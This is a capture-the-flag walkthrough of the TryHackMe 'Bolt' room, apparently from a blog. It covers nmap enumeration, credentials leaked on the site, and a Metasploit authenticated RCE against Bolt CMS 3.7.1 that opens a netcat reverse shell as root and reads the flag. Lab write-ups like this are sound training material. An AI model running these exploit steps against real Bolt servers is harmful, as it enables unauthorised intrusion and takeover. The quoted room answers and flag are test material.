Tryhackme - Bolt

Tryhackme – Bolt

In this walk through, we will be going through the Bolt room from Tryhackme. This room covers the exploitation of the Bolt CMS with an authenticated Remote Code Execution exploit. The room expect basic enumeration skills and usage of the exploitation framework like Metasploit. So, let’s get started.

Bolt - Introduction

Machine Info:

TitleBolt
IPaddress10.10.236.41
DifficultyEasy
ObjectiveThis room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. You should wait for at least 3-4 minutes for the machine to start properly.

Task 1 – Deploy the machine

Task 1 - Deploy the machine

Task 2 – Hack your way into the machine!

Question 1 – What port number has a web server with a CMS running?

  • We started with a regular nmap scan specifying the flags for Half Syn Scan and Service Detection.

wh1terose@fsociety:~$ nmap -sS -sV 10.10.236.41

Host is up (0.24s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open     http    (PHP 7.2.32-1)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.45 seconds

nmap scan

8000

Question 2 – What is the username we can find in the CMS?

  • Explore the web application on port 8000.

Bolt CMS username

bolt

Question 3 – What is the password we can find for the username?

  • By Navigating to the following URL with reveal the password for the username bolt.
http://<Machine IP>:8000/entry/message-for-it-department

Bolt username password
 boltadmin123

Question 4 – What version of the CMS is installed on the server? (Ex: Name 1.1.1)

  • Navigating to the following will reveal the login page for the bolt CMS. Further, logging in into the dashboard with the earlier found credentials reveals the version information of the CMS in the bottom of the page.
http://<Machine IP>:8000/bolt/login

Bolt CMS login page

Bolt version

Bolt 3.7.1

Question 5 – There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?

  • Google the Bolt version 3.7.1 for known exploits. You will find a Exploit DB link mentioning an Authenticated Remote Code Execution exploit for Bolt 3.7.0

Bolt Authenticated RCE

48296

Question 6 – Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit

Done

Question 7 – Look for flag.txt inside the machine.

  • Use the metasploit bolt_authenticated_rce exploit to get the root shell and get the required flag to complete the room.

msf6 > use exploit/unix/webapp/bolt_authenticated_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/bolt_authenticated_rce) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
    0   Linux (x86)
    1   Linux (x64)
=>  2   Linux (cmd)


msf6 exploit(unix/webapp/bolt_authenticated_rce) > show options

Module options (exploit/unix/webapp/bolt_authenticated_rce):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD                                    yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                8000                   yes       The target port (TCP)
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME                                    yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all ad
                                       dresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/bolt_authenticated_rce) > set LHOST 10.18.11.103
LHOST => 10.18.11.103
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt
USERNAME => bolt
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set password boltadmin123
password => boltadmin123
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS 10.10.236.41 
RHOSTS => 10.10.236.41
msf6 exploit(unix/webapp/bolt_authenticated_rce) > exploit

[*] Started reverse TCP handler on 10.18.11.103:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "jnayvn".
[*] Found 3 potential token(s) for creating .php files.
[+] Used token 0f1630df2cf71d71dbdd805609 to create ncwepzlb.php.
[*] Attempting to execute the payload via "/files/ncwepzlb.php?jnayvn=`payload`"
[!] No response, may have executed a blocking payload!
[*] Command shell session 1 opened (10.18.11.103:4444 -> 10.10.236.41:58902) at 2023-05-12 22:01:49 +0530
[+] Deleted file ncwepzlb.php.
[+] Reverted user profile back to original state.

id
uid=0(root) gid=0(root) groups=0(root)
ls      
index.html
cd /root
ls
cd /home
ls
bolt
composer-setup.php
flag.txt
cat flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

Msfconsole targets

Msfconsole options

Got the flag

Task 2 - Hack your way into the machine!

Also Read: Tryhackme – Blue

Conclusion:

Conclusion

So that was it. We just completed the “Bolt” room. Let’s summarize it quickly. First, we started with our usual nmap scan where we found a webserver on port 8000 running the Bolt CMS. Exploring the web app reveals the username and password for the backend. Logging in with the earlier found credentials, gives us the version of the CMS running. Googling the version for known public exploits reveals an authenticated RCE for version 3.7.0. Using the Metasploit for the same and gaining the root shell gives us our final flag for the room.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top